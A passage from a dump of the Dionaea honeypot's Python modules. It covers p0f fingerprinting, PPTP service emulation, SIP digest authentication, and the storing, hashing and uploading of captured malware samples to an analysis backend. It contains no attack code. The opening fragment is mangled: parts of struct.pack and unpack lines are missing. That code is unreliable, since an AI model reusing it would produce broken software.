with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | 29 | from dionaea.smb.include.fieldtypes import * 30 | 31 | class Int24Field(IntField): 32 | def __init__(self, name, default): 33 | IntField.__init__(self,name,default) 34 | def i2len(self, pkt, i): 35 | return 3 36 | def i2m(self, pkt, y): 37 | return struct.pack("> 8, (y&0xff0000) >> 16) 38 | def m2i(self, pkt, x): 39 | (l,m,h) = struct.unpack(" 0 and y < 250: 118 | l = struct.pack("= 2.0.8 50 | data = pack("III4s4sHH", 51 | 0x0defaced, # p0f magic 52 | 1, # type 53 | 0xffffffff, # id 54 | inet_aton(self.con.remote.host),# remote host 55 | inet_aton(self.con.local.host), # local host 56 | self.con.remote.port, # remote port 57 | self.con.local.port) # local port 58 | else: 59 | # p0f < 2.0.8 60 | data = pack("=II4s4sHH", 61 | 0x0defaced, # p0f magic 62 | 0xffffffff, # type 63 | inet_aton(self.con.remote.host),# remote host 64 | inet_aton(self.con.local.host), # local host 65 | self.con.remote.port, # remote port 66 | self.con.local.port) # local port 67 | 68 | self.send(data) 69 | 70 | def handle_io_in(self, data): 71 | fmt = "IIB20s40sB30s30sBBBhHi" 72 | if len(data) != calcsize(fmt): 73 | return 0 74 | values = unpack(fmt, data) 75 | names=["magic","id","type","genre","detail","dist","link","tos","fw","nat","real","score","mflags","uptime"] 76 | icd = incident(origin='dionaea.modules.python.p0f') 77 | for i in range(len(values)): 78 | s = values[i] 79 | if type(s) == bytes: 80 | if s.find(b'\x00'): 81 | s = s[:s.find(b'\x00')] 82 | icd.set(names[i], s) 83 | elif type(s) == int: 84 | icd.set(names[i], str(s)) 85 | icd.set('con',self.con) 86 | icd.report() 87 | self.close() 88 | return len(data) 89 | 90 | def handle_disconnect(self): 91 | self.con.unref() 92 | return 0 93 | 94 | def handle_error(self, err): 95 | self.con.unref() 96 | 97 | class p0fhandler(ihandler): 98 | def __init__(self, p0fpath): 99 | logger.debug("p0fHandler") 100 | ihandler.__init__(self, 'dionaea.connection.*') 101 | self.p0fpath = p0fpath 102 | 103 | def handle_incident(self, icd): 104 | if icd.origin == 'dionaea.connection.tcp.accept' or icd.origin == 'dionaea.connection.tls.accept' or icd.origin == 'dionaea.connection.tcp.reject': 105 | logger.debug("p0f action") 106 | # icd.dump() 107 | con = icd.get('con') 108 | p = p0fconnection(self.p0fpath, con) 109 | 110 | 111 | 112 | 113 | # p0f = p0fHandler('un:///tmp/p0f.sock') 114 | -------------------------------------------------------------------------------- /modules/python/scripts/pptp/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/pptp/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/pptp/include/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/pptp/include/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/pptp/include/packets.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2015 Tan Kean Siong 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | from dionaea.smb.include.packet import * 29 | from dionaea.smb.include.fieldtypes import * 30 | 31 | #PPTP Control Message Types 32 | PPTP_CTRMSG_TYPE_STARTCTRCON_REQUEST = 0x01 33 | PPTP_CTRMSG_TYPE_STARTCTRCON_REPLY = 0x02 34 | PPTP_CTRMSG_TYPE_OUTGOINGCALL_REQUEST = 0x07 35 | PPTP_CTRMSG_TYPE_OUTGOINGCALL_REPLY = 0x08 36 | 37 | #PPP Link Control Protocol Types 38 | PPP_LCP_Configuration_Request = 0x01 39 | 40 | # https://www.ietf.org/rfc/rfc2637.txt 41 | class PPTP_StartControlConnection_Request(Packet): 42 | name="PPTP Start-Control-Connection-Request" 43 | controlmessage_type = PPTP_CTRMSG_TYPE_STARTCTRCON_REQUEST 44 | fields_desc =[ 45 | XShortField("Length",0), 46 | XShortField("MessageType",0), 47 | XIntField("MagicCookie",0), 48 | XShortField("ControlMessageType",0), 49 | XShortField("Reserved",0), 50 | XShortField("ProtocolVersion",0), 51 | XShortField("Reserved",0), 52 | 53 | XIntField("FramingCapabilites",0), 54 | XIntField("BearerCapabilites",0), 55 | XShortField("MaxChannels",0), 56 | XShortField("FirmwareRevision",0), 57 | StrFixedLenField("HostName", "", 64), 58 | StrFixedLenField("VendorName", "", 64), 59 | ] 60 | 61 | class PPTP_StartControlConnection_Reply(Packet): 62 | name="PPTP Start-Control-Connection-Reply" 63 | controlmessage_type = PPTP_CTRMSG_TYPE_STARTCTRCON_REPLY 64 | fields_desc =[ 65 | XShortField("Length",0x9c), 66 | XShortField("MessageType",0x01), 67 | XIntField("MagicCookie",0x1a2b3c4d), 68 | XShortField("ControlMessageType",0x02), 69 | XShortField("Reserved",0), 70 | LEShortField("ProtocolVersion",0x01), 71 | ByteField("ResultCode",0x01), 72 | ByteField("ErrorCode",0x00), 73 | LEIntField("FramingCapabilites",0), 74 | LEIntField("BearerCapabilites",0), 75 | XShortField("MaxChannels",1), 76 | XShortField("FirmwareRevision",1), 77 | StrFixedLenField("HostName", "", 64), 78 | StrFixedLenField("VendorName", "", 64), 79 | ] 80 | 81 | class PPTP_OutgoingCall_Request(Packet): 82 | name="PPTP Outgoing-Call-Request" 83 | controlmessage_type = PPTP_CTRMSG_TYPE_OUTGOINGCALL_REQUEST 84 | fields_desc =[ 85 | XShortField("Length",0), 86 | XShortField("MessageType",0), 87 | XIntField("MagicCookie",0), 88 | XShortField("ControlMessageType",0), 89 | XShortField("Reserved",0), 90 | XShortField("CallID",0), 91 | XShortField("CallSerialNumber",0), 92 | XIntField("MinBPS",0), 93 | XIntField("MaxBPS",0), 94 | XIntField("BearerType",0), 95 | XIntField("FramingType",0), 96 | XShortField("PacketWindowSize",0), 97 | XShortField("PacketProcessingDelay",0), 98 | XShortField("PacketNumberLength",0), 99 | XShortField("Reserved",0), 100 | StrFixedLenField("PhoneNumber", "", 64), 101 | StrFixedLenField("Subaddress", "", 64), 102 | ] 103 | 104 | class PPTP_OutgoingCall_Reply(Packet): 105 | name="PPTP Outgoing-Call-Reply" 106 | controlmessage_type = PPTP_CTRMSG_TYPE_OUTGOINGCALL_REPLY 107 | fields_desc =[ 108 | XShortField("Length",0x20), 109 | XShortField("MessageType",0x01), 110 | XIntField("MagicCookie",0x1a2b3c4d), 111 | XShortField("ControlMessageType",0x08), 112 | XShortField("Reserved",0), 113 | XShortField("CallID",0x480), 114 | XShortField("PeerCallID",0), 115 | ByteField("ResultCode",0x01), 116 | ByteField("ErrorCode",0x00), 117 | XShortField("CauseCode",0), 118 | XIntField("ConnectSpeed",0x05F5E100), 119 | XShortField("PacketWindowSize",0x2000), 120 | XShortField("PacketProcessingDelay",0), 121 | XShortField("PacketNumberLength",0), 122 | XShortField("PhysicalChannelID",0), 123 | ] 124 | 125 | class PPTP(Packet): 126 | name="PPTP" 127 | fields_desc =[ 128 | ByteField("Address",0), 129 | ByteField("Control",0), 130 | XShortField("Protocol",0), 131 | ] 132 | 133 | class PPP_LCP_Configuration_Request(Packet): 134 | name="PPP LCP_Configuration_Request" 135 | controlmessage_type = PPP_LCP_Configuration_Request 136 | fields_desc =[ 137 | ByteField("Code",0), 138 | ByteField("Identifier",0), 139 | XShortField("Length",0), 140 | StrFixedLenField("Options", b"", length_from=lambda pkt: pkt.Length-4), 141 | ] 142 | 143 | -------------------------------------------------------------------------------- /modules/python/scripts/pptp/pptp.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2015 Tan Kean Siong 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | from dionaea.core import * 29 | 30 | import datetime 31 | import traceback 32 | import logging 33 | import binascii 34 | import os 35 | import tempfile 36 | 37 | from dionaea.pptp.include.packets import * 38 | 39 | logger = logging.getLogger('pptp') 40 | 41 | class pptpd(connection): 42 | def __init__ (self): 43 | connection.__init__(self,"tcp") 44 | self.buf = b'' 45 | 46 | def handle_established(self): 47 | self.timeouts.idle = 120 48 | self.processors() 49 | 50 | def handle_io_in(self, data): 51 | l=0 52 | size = 0 53 | chunk = b'' 54 | 55 | if len(data) > l: 56 | p = None 57 | x = None 58 | try: 59 | 60 | if len(data) > 100: 61 | p = PPTP_StartControlConnection_Request(data); 62 | p.show() 63 | 64 | if p.Length == 0: 65 | logger.warn("Bad PPTP Packet, Length = 0") 66 | return l 67 | 68 | self.pendingPacketType = p.ControlMessageType 69 | 70 | if len(data) < 100: 71 | logger.warn("PPTP Packet, Length < 100") 72 | 73 | except: 74 | t = traceback.format_exc() 75 | logger.critical(t) 76 | return l 77 | 78 | if self.pendingPacketType == PPTP_CTRMSG_TYPE_STARTCTRCON_REQUEST: 79 | x = PPTP_StartControlConnection_Request(data) 80 | 81 | # we can gather some values from the client, maybe use for fingerprinting clients 82 | #l = p.getlayer(PPTP_StartControlConnection_Request) 83 | i = incident("dionaea.modules.python.pptp.connect") 84 | i.con = self 85 | logger.debug("pptp remote hostname: {0} ".format(x.HostName)) 86 | i.remote_hostname = x.HostName 87 | i.report() 88 | 89 | elif self.pendingPacketType == PPTP_CTRMSG_TYPE_OUTGOINGCALL_REQUEST: 90 | x = PPTP_OutgoingCall_Request(data) 91 | 92 | # FIXME after these, the client will send in Generic Routing Encapsulation (PPP) traffic 93 | # dionaea currently not able to support these PPP traffic 94 | 95 | self.buf = b'' 96 | x.show() 97 | 98 | r = None 99 | r = self.process( self.pendingPacketType, x) 100 | 101 | if r: 102 | r.show() 103 | self.send(r.build()) 104 | 105 | return len(data) 106 | 107 | def process(self, PacketType, p): 108 | r ='' 109 | rp = None 110 | 111 | if PacketType == PPTP_CTRMSG_TYPE_STARTCTRCON_REQUEST: 112 | r = PPTP_StartControlConnection_Reply() 113 | elif PacketType == PPTP_CTRMSG_TYPE_OUTGOINGCALL_REQUEST: 114 | r = PPTP_OutgoingCall_Reply() 115 | else: 116 | logger.warn("UNKNOWN PACKET TYPE FOR PPTP {}".format(PacketType)) 117 | 118 | return r 119 | 120 | def handle_timeout_idle(self): 121 | return False 122 | 123 | def handle_disconnect(self): 124 | return False 125 | 126 | -------------------------------------------------------------------------------- /modules/python/scripts/sip/rfc2617.py: -------------------------------------------------------------------------------- 1 | """ 2 | RFC2617 3 | 4 | :See: http://tools.ietf.org/html/rfc2617 5 | 6 | """ 7 | 8 | import hashlib 9 | import re 10 | 11 | def quote(data): 12 | """ 13 | Quote a string 14 | >>> print(quote(b'test'), quote(b'"test'), quote(b'test"'), quote(b'"test"')) 15 | b'"test"' b'"test"' b'"test"' b'"test"' 16 | """ 17 | if type(data) == str: 18 | data = bytes(data, "utf-8") 19 | 20 | data = data.strip() 21 | if data[0] != 34: # ASCII Code 34 = " 22 | data = b'"' + data 23 | 24 | if data[-1] != 34: 25 | data = data + b'"' 26 | 27 | return data 28 | 29 | def unquote(data): 30 | """ 31 | Unquote a string 32 | >>> print(unquote(b'test'), unquote(b'"test'), unquote(b'test"'), unquote(b'"test"')) 33 | b'test' b'test' b'test' b'test' 34 | """ 35 | if type(data) == str: 36 | data = bytes(data, "utf-8") 37 | 38 | data = data.strip() 39 | if data[0] == 34: # ASCII Code 34 = " 40 | data = data[1:] 41 | 42 | if data[-1] == 34: 43 | data = data[:-1] 44 | 45 | return data 46 | 47 | 48 | class Authentication(object): 49 | """ 50 | >>> a = Authentication(method = "basic", realm = "test") 51 | >>> print(a.dumps()) 52 | b'Basic realm="test"' 53 | >>> a = Authentication(method = "digest", realm = "test", domain = "example.org", algorithm = "md5", nonce = "abcd") 54 | >>> print(a.dumps()) 55 | b'Digest realm="test", domain="example.org", algorithm=MD5, nonce="abcd"' 56 | >>> a = Authentication.froms(b'Digest realm="test", algorithm="MD5", nonce="efgh", domain="example.org"') 57 | >>> print(a.method, a.algorithm, a.domain, a.nonce, a.realm) 58 | b'digest' b'MD5' b'example.org' b'efgh' b'test' 59 | """ 60 | _quote = ["realm", "domain", "nonce", "response", "uri"] 61 | _noquote = ["algorithm"] 62 | 63 | def __init__(self, method = "basic", realm = None, domain = None, algorithm = None, nonce = None, response = None, uri = None): 64 | self.method = method 65 | self.realm = realm 66 | self.domain = domain 67 | self.algorithm = algorithm 68 | self.nonce = nonce 69 | self.response = response 70 | self.uri = uri 71 | 72 | def check(self, username, password, method, auth): 73 | digest = create_digest( 74 | algorithm = "md5", 75 | method = method, 76 | nonce = self.nonce, 77 | password = password, 78 | realm = self.realm, 79 | uri = auth.uri, 80 | username = username 81 | ) 82 | 83 | if digest == auth.response: 84 | return True 85 | 86 | return False 87 | 88 | def dumps(self): 89 | if self.method == "digest": 90 | ret = [] 91 | for n in ["realm", "domain", "uri", "algorithm", "nonce", "response"]: 92 | v = getattr(self, n) 93 | if v == None: 94 | continue 95 | 96 | if n == "algorithm": 97 | v = v.upper() 98 | 99 | if n in self._quote: 100 | v = quote(v) 101 | 102 | if n in self._noquote: 103 | v = unquote(v) 104 | 105 | ret.append(bytes(n, "utf-8") + b"=" + v) 106 | 107 | return b"Digest " + b", ".join(ret) 108 | 109 | return b"Basic realm=" + quote(self.realm) 110 | 111 | @classmethod 112 | def froms(cls, data): 113 | return cls(**cls.loads(data)[1]) 114 | 115 | @classmethod 116 | def loads(cls, data): 117 | l = len(data) 118 | if type(data) == str: 119 | data = bytes(data, "utf-8") 120 | 121 | method, data = re.split(b" *", data, 1) 122 | ret = { 123 | "method": method.lower() 124 | } 125 | 126 | for part in re.split(b" *, *", data): 127 | n,s,v = part.partition(b"=") 128 | n = n.decode("utf-8") 129 | if n in cls._quote: 130 | ret[n] = unquote(v) 131 | if n in cls._noquote: 132 | # this values shouldn't be quoted, but nevertheless some clients do it 133 | ret[n] = unquote(v) 134 | 135 | return (l, ret) 136 | 137 | # :See: http://tools.ietf.org/html/rfc2617#page-10 138 | H = lambda d: bytes(hashlib.md5(d).hexdigest(), "utf-8") 139 | KD = lambda secret, data: H(secret + b":" + data) 140 | 141 | 142 | def create_digest(algorithm = None, cnonce = None, method = None, nonce = None, password = None, realm = None, uri = None, username = None): 143 | """ 144 | >>> print(create_digest(algorithm = "md5", method = "REGISTER", nonce = "foobar", password = "secret", realm = "sip-server", uri = "sip:sip-server", username = "alice")) 145 | b'8b30552864468e5e6ab1eb2b87d1b92f' 146 | """ 147 | if type(algorithm) == str: 148 | algorithm = bytes(algorithm, "utf-8") 149 | if type(cnonce) == str: 150 | cnonce = bytes(cnonce, "utf-8") 151 | if type(method) == str: 152 | method = bytes(method, "utf-8") 153 | if type(nonce) == str: 154 | nonce = bytes(nonce, "utf-8") 155 | if type(password) == str: 156 | password = bytes(password, "utf-8") 157 | if type(realm) == str: 158 | realm = bytes(realm, "utf-8") 159 | if type(uri) == str: 160 | uri = bytes(uri, "utf-8") 161 | if type(username) == str: 162 | username = bytes(username, "utf-8") 163 | 164 | # :See: http://tools.ietf.org/html/rfc2617#page-13 165 | if algorithm and algorithm.lower() == 'md5-sess': 166 | A1 = H(username + b":" + realm + b":" + password) + b":" + nonce + b":" + cnonce 167 | else: 168 | A1 = username + b":" + realm + b":" + password 169 | 170 | A2 = method + b":" + uri 171 | 172 | return KD(H(A1), nonce + b":" + H(A2)) 173 | 174 | if __name__ == '__main__': 175 | import doctest 176 | doctest.testmod() 177 | -------------------------------------------------------------------------------- /modules/python/scripts/smb/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/smb/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/smb/include/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/smb/include/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/smb/include/asn1/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | # We do not import mib.py because it is more bound to scapy and 7 | # less prone to be used in a standalone fashion 8 | __all__ = ["asn1","ber"] 9 | -------------------------------------------------------------------------------- /modules/python/scripts/smb/include/asn1packet.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2010 Markus Koetter 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | #* This file was part of Scapy 28 | #* See http://www.secdev.org/projects/scapy for more informations 29 | #* Copyright (C) Philippe Biondi 30 | #* This program is published under a GPLv2 license 31 | #******************************************************************************* 32 | 33 | 34 | from .packet import * 35 | 36 | class ASN1_Packet(Packet): 37 | ASN1_root = None 38 | ASN1_codec = None 39 | def init_fields(self): 40 | flist = self.ASN1_root.get_fields_list() 41 | self.do_init_fields(flist) 42 | self.fields_desc = flist 43 | def do_build(self): 44 | return self.ASN1_root.build(self) 45 | def do_dissect(self, x): 46 | return self.ASN1_root.dissect(self, x) 47 | 48 | 49 | -------------------------------------------------------------------------------- /modules/python/scripts/store.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | 29 | from dionaea.core import ihandler, incident, g_dionaea 30 | from dionaea.util import md5file 31 | 32 | import os 33 | import logging 34 | logger = logging.getLogger('store') 35 | logger.setLevel(logging.DEBUG) 36 | 37 | 38 | class storehandler(ihandler): 39 | def __init__(self, path): 40 | logger.debug("%s ready!" % (self.__class__.__name__)) 41 | ihandler.__init__(self, path) 42 | def handle_incident(self, icd): 43 | logger.debug("storing file") 44 | p = icd.path 45 | md5 = md5file(p) 46 | n = g_dionaea.config()['downloads']['dir'] + '/' + md5 47 | i = incident("dionaea.download.complete.hash") 48 | i.file = n 49 | i.url = icd.url 50 | if hasattr(icd, 'con'): 51 | i.con = icd.con 52 | i.md5hash = md5 53 | i.report() 54 | 55 | try: 56 | f = os.stat(n) 57 | i = incident("dionaea.download.complete.again") 58 | logger.debug("file %s already existed" % md5) 59 | except OSError: 60 | logger.debug("saving new file %s to %s" % (md5, n)) 61 | os.link(p, n) 62 | i = incident("dionaea.download.complete.unique") 63 | i.file = n 64 | if hasattr(icd, 'con'): 65 | i.con = icd.con 66 | i.url = icd.url 67 | i.md5hash = md5 68 | i.report() 69 | 70 | 71 | 72 | 73 | -------------------------------------------------------------------------------- /modules/python/scripts/submit_http.py: -------------------------------------------------------------------------------- 1 | from dionaea.core import ihandler, incident, g_dionaea 2 | from dionaea.util import md5file, sha512file 3 | from dionaea import pyev 4 | 5 | import logging 6 | import json 7 | import uuid 8 | import struct 9 | import socket 10 | from urllib.parse import urlparse 11 | 12 | try: 13 | import magic 14 | except: 15 | def filetype(fpath): 16 | return '' 17 | else: 18 | def filetype(fpath): 19 | try: 20 | mc = magic.Magic() 21 | ftype = mc.from_file(fpath) 22 | except: 23 | ftype = '' 24 | return ftype 25 | 26 | logger = logging.getLogger('submit_http') 27 | logger.setLevel(logging.DEBUG) 28 | 29 | class submithttp_report: 30 | def __init__(self, sha512h, md5, filepath): 31 | self.sha512h, self.md5h, self.filepath = sha512h, md5, filepath 32 | self.saddr, self.sport, self.daddr, self.dport = ('', )*4 33 | self.download_url = '' 34 | self.filetype = '' 35 | self.filename = '' 36 | 37 | 38 | class handler(ihandler): 39 | def __init__(self, path): 40 | logger.debug("%s ready!" % (self.__class__.__name__)) 41 | ihandler.__init__(self, path) 42 | mwsconfig = g_dionaea.config()['modules']['python']['submit_http'] 43 | self.backendurl = mwsconfig['url'] 44 | self.email = 'email' in mwsconfig and mwsconfig['email'] or 'dionaea@carnivore.it' 45 | self.user = 'user' in mwsconfig and mwsconfig['user'] or '' 46 | self.passwd = 'pass' in mwsconfig and mwsconfig['pass'] or '' 47 | self.cookies = {} 48 | 49 | # heartbeats 50 | dinfo = g_dionaea.version() 51 | self.software = 'dionaea {0} {1}/{2} - {3} {4}'.format( 52 | dinfo['dionaea']['version'], 53 | dinfo['compiler']['os'], 54 | dinfo['compiler']['arch'], 55 | dinfo['compiler']['date'], 56 | dinfo['compiler']['time'], 57 | ) 58 | self.loop = pyev.default_loop() 59 | 60 | def handle_incident(self, icd): 61 | pass 62 | 63 | def handle_incident_dionaea_download_complete_unique(self, icd): 64 | cookie = str(uuid.uuid4()) 65 | 66 | i = incident("dionaea.upload.request") 67 | i._url = self.backendurl 68 | 69 | i.sha512 = sha512file(icd.file) 70 | i.md5 = md5file(icd.file) 71 | i.email = self.email 72 | i.user = self.user 73 | i.set('pass', self.passwd) 74 | 75 | mr = submithttp_report(i.sha512, i.md5, icd.file) 76 | 77 | if hasattr(icd, 'con'): 78 | i.source_host = str(struct.unpack('!I', socket.inet_aton(icd.con.remote.host))[0]) 79 | i.source_port = str(icd.con.remote.port) 80 | i.target_host = str(struct.unpack('!I', socket.inet_aton(icd.con.local.host))[0]) 81 | i.target_port = str(icd.con.local.port) 82 | mr.saddr, mr.sport, mr.daddr, mr.dport = i.source_host, i.source_port, i.target_host, i.target_port 83 | if hasattr(icd, 'url'): 84 | i.url = icd.url 85 | i.trigger = icd.url 86 | try: 87 | i.filename = urlparse(icd.url).path.split('/')[-1] 88 | mr.filename = i.filename 89 | except: 90 | pass 91 | mr.download_url = icd.url 92 | 93 | i.filetype = filetype(icd.file) 94 | mr.filetype = i.filetype 95 | 96 | i._callback = "dionaea.modules.python.submithttp.result" 97 | i._userdata = cookie 98 | 99 | self.cookies[cookie] = mr 100 | i.report() 101 | 102 | # handle agains in the same way 103 | handle_incident_dionaea_download_complete_again = handle_incident_dionaea_download_complete_unique 104 | 105 | def handle_incident_dionaea_modules_python_submithttp_result(self, icd): 106 | fh = open(icd.path, mode="rb") 107 | c = fh.read() 108 | logger.info("submithttp result: {0}".format(c)) 109 | 110 | cookie = icd._userdata 111 | mr = self.cookies[cookie] 112 | 113 | # does backend want us to upload? 114 | if b'UNKNOWN' in c or b'S_FILEREQUEST' in c: 115 | i = incident("dionaea.upload.request") 116 | i._url = self.backendurl 117 | 118 | i.sha512 = mr.sha512h 119 | i.md5 = mr.md5h 120 | i.email = self.email 121 | i.user = self.user 122 | i.set('pass', self.passwd) 123 | 124 | i.set('file://data', mr.filepath) 125 | 126 | i.source_host = mr.saddr 127 | i.source_port = mr.sport 128 | i.target_host = mr.daddr 129 | i.target_port = mr.dport 130 | i.url = mr.download_url 131 | i.trigger = mr.download_url 132 | 133 | i.filetype = mr.filetype 134 | i.filename = mr.filename 135 | 136 | i._callback = "dionaea.modules.python.submithttp.uploadresult" 137 | i._userdata = cookie 138 | 139 | i.report() 140 | else: 141 | del self.cookies[cookie] 142 | 143 | def handle_incident_dionaea_modules_python_submithttp_uploadresult(self, icd): 144 | fh = open(icd.path, mode="rb") 145 | c = fh.read() 146 | logger.info("submithttp uploadresult: {0}".format(c)) 147 | 148 | del self.cookies[icd._userdata] 149 | 150 | 151 | -------------------------------------------------------------------------------- /modules/python/scripts/test.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | from dionaea.core import ihandler, incident, g_dionaea 29 | from dionaea.core import connection 30 | import logging 31 | import json 32 | global p 33 | 34 | logger = logging.getLogger('test') 35 | logger.setLevel(logging.DEBUG) 36 | 37 | 38 | class uniquedownloadihandler(ihandler): 39 | def __init__(self, path): 40 | logger.debug("%s ready!" % (self.__class__.__name__)) 41 | ihandler.__init__(self, path) 42 | def handle_incident(self, icd): 43 | logger.debug("submitting file") 44 | try: 45 | tos = g_dionaea.config()['submit'] 46 | except: 47 | return 48 | 49 | for to in tos: 50 | if 'urls' not in tos[to]: 51 | logger.warn("your configuration lacks urls to submit to %s" % to) 52 | continue 53 | for url in tos[to]['urls']: 54 | i = incident("dionaea.upload.request") 55 | i._url = url 56 | # copy all values for this url 57 | for key in tos[to]: 58 | if key == 'urls': 59 | continue 60 | if key == 'file_fieldname': 61 | i.set("file://" + tos[to][key], icd.file) 62 | continue 63 | i.set(key, tos[to][key]) 64 | i.report() 65 | -------------------------------------------------------------------------------- /modules/python/scripts/upnp/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/upnp/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/util.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2010 Mark Schloesser 8 | #* Copyright (C) 2009 Paul Baecher & Markus Koetter 9 | #* 10 | #* This program is free software; you can redistribute it and/or 11 | #* modify it under the terms of the GNU General Public License 12 | #* as published by the Free Software Foundation; either version 2 13 | #* of the License, or (at your option) any later version. 14 | #* 15 | #* This program is distributed in the hope that it will be useful, 16 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 17 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 18 | #* GNU General Public License for more details. 19 | #* 20 | #* You should have received a copy of the GNU General Public License 21 | #* along with this program; if not, write to the Free Software 22 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 23 | #* 24 | #* 25 | #* contact nepenthesdev@gmail.com 26 | #* 27 | #*******************************************************************************/ 28 | 29 | 30 | import sys 31 | import hashlib 32 | 33 | def md5file(filename): 34 | return hashfile(filename, hashlib.md5()) 35 | 36 | def sha512file(filename): 37 | return hashfile(filename, hashlib.sha512()) 38 | 39 | def hashfile(filename, digest): 40 | fh = open(filename, 